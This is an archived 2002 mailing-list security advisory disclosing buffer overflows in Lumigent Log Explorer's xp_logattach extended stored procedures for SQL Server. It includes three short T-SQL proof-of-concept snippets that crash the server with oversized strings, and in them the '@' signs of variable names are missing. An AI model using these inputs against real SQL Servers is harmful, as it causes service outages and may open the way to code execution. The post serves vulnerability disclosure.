OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: martin rakhmanoff (jimmersyandex.ru)
Date: Fri Jun 14 2002 - 08:05:15 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
    Server 7/2000. It ships with extended stored procedures implemented in
    xp_logattach.dll. Some of them suffer from buffer overflows that lead to
    SQL Server service crash and potentially to arbitrary code execution.
    Below is sample code that crashes SQL Server:

    declare bo varchar(8000)
    set bo = replicate('A', 800)
    exec xp_logattach_StartProf bo

    declare bo varchar(8000)
    set bo = replicate('A',800)
    exec xp_logattach_setport bo

    declare bo varchar(8000)
    set bo = replicate('A',800)
    exec xp_logattach bo

    Procedures can be run only by dbo (master) by default. Vendor was informed
    but I got no response confirming this problem and no fixes.

    Cheers

    Martin Rakhmanoff (jimmers)
    jimmersyandex.ru